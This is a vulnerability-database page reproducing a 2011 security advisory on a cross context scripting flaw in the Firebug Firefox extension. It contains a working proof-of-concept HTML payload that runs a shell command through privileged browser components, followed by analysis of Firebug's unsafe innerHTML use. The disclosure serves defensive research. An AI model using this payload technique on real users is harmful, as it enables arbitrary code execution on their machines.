Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Firebug Cross Context Scripting

🗓️ 19 Jun 2011 00:00:00Reported by 80vulType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Firebug Firefox Extension Cross Context Scripting Vulnerability discovered by 80vul.com in 2011, allows execution of arbitrary code in the user's system through a demo URL

Code
`http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm  
  
*Firebug Firefox Extension Cross Context Scripting Vulnerability*  
  
  
  
Author: www.80vul.com [Email:5up3rh3i#gmail.com]  
  
2011/06/18 - Public Disclosure  
  
  
  
*Description*  
  
  
  
80vul.com discovered firebug that a famous firefox extension is vulnerable  
to Cross Context Scripting, and this vul can execute evil codz in the chrome  
privileged Firefox zone.so successful exploitation allows execution of  
arbitrary code in user’s system.  
  
  
  
  
  
*Exploitation*  
  
  
  
a demo : http://www.80vul.com/firefox/firebug0day.htm  
  
  
  
<html>  
  
<head>firebug 0day</head>  
  
<body>  
  
<img src=2 onerror='var file = Components.classes["@mozilla.org/file/local;1  
"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath  
("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"].  
createInstance(Components.interfaces.nsIProcess);process.init(file);var  
args= ["-c", "  
gcalctool"];process.run(false, args, args.length);'></img>  
  
</body>  
  
</html>  
  
  
  
Open the firebug, and visite the exploit's URL, then open "NET"  
-->URL-->"HTML" , and gcalctool is executed.  
  
  
  
  
  
  
  
*Analysis*  
  
  
  
extract the code from [email protected] by rar or zip .  
then let’s go ...  
  
  
  
80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./  
[email protected]/ --colour  
  
./[email protected]/content/firebug/traceModule.js:1128:  
iframe.contentWindow.document.body.innerHTML = text;  
  
./[email protected]/content/firebug/net.js:2561:  
iframe.contentWindow.document.body.innerHTML = text;  
  
  
  
80vul@ubuntu:~$ grep -in 'body.innerHTML' -r ./  
[email protected]/content/firebug/net.js --colour -8  
  
2553- }  
  
2554-  
  
2555- if (hasClass(tab, "netInfoHtmlTab") && file.loaded && !  
netInfoBox.htmlPresented)  
  
2556- {  
  
2557- netInfoBox.htmlPresented = true;  
  
2558-  
  
2559- var text = Utils.getResponseText(file, context);  
  
2560- var iframe = netInfoBox.getElementsByClassName("  
netInfoHtmlPreview").item(0);  
  
2561: iframe.contentWindow.document.body.innerHTML = text;  
  
2562- }  
  
2563-  
  
2564- // Notify listeners about update so, content of custom tabs can  
be updated.  
  
2565- dispatch(NetInfoBody.fbListeners, "updateTabBody", [netInfoBox,  
file, context]);  
  
2566- },  
  
2567-  
  
2568- setResponseText: function(file, netInfoBox, responseTextBox,  
context)  
  
2569- {  
  
  
  
edit the content/firebug/net.js and seach "netInfoHtmlTab":  
  
  
  
80vul@ubuntu:~$ gedit ./  
[email protected]/content/firebug/net.js  
  
  
  
Firebug.NetMonitor.NetInfoBody = domplate(Firebug.Rep, new Firebug.Listener  
(),  
  
{  
  
tag:  
  
DIV({"class": "netInfoBody", _repObject: "$file"},  
  
TAG("$infoTabs", {file: "$file"}),  
  
TAG("$infoBodies", {file: "$file"})  
  
),  
  
  
  
infoTabs:  
  
DIV({"class": "netInfoTabs focusRow subFocusRow", "role": "tablist  
"},  
  
A({"class": "netInfoParamsTab netInfoTab a11yFocus", onclick: "$  
onClickTab", "role": "tab",  
  
view: "Params",  
  
$collapsed: "$file|hideParams"},  
  
$STR("URLParameters")  
  
),  
  
A({"class": "netInfoHeadersTab netInfoTab a11yFocus", onclick:  
"$onClickTab", "role": "tab",  
  
view: "Headers"},  
  
$STR("Headers")  
  
),  
  
A({"class": "netInfoPostTab netInfoTab a11yFocus", onclick: "$  
onClickTab", "role": "tab",  
  
view: "Post",  
  
$collapsed: "$file|hidePost"},  
  
$STR("Post")  
  
),  
  
A({"class": "netInfoPutTab netInfoTab a11yFocus", onclick: "$  
onClickTab", "role": "tab",  
  
view: "Put",  
  
$collapsed: "$file|hidePut"},  
  
$STR("Put")  
  
),  
  
A({"class": "netInfoResponseTab netInfoTab a11yFocus", onclick:  
"$onClickTab", "role": "tab",  
  
view: "Response",  
  
$collapsed: "$file|hideResponse"},  
  
$STR("Response")  
  
),  
  
A({"class": "netInfoCacheTab netInfoTab a11yFocus", onclick: "$  
onClickTab", "role": "tab",  
  
view: "Cache",  
  
$collapsed: "$file|hideCache"},  
  
$STR("Cache")  
  
),  
  
A({"class": "netInfoHtmlTab netInfoTab a11yFocus", onclick: "$  
onClickTab", "role": "tab",  
  
view: "Html",  
  
$collapsed: "$file|hideHtml"},  
  
$STR("HTML")  
  
)  
  
),  
  
  
  
  
  
  
hitest  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Jun 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
cross context scriptingfirebug80vul.comfirefoxvulnerabilityexecutionarbitrary code
17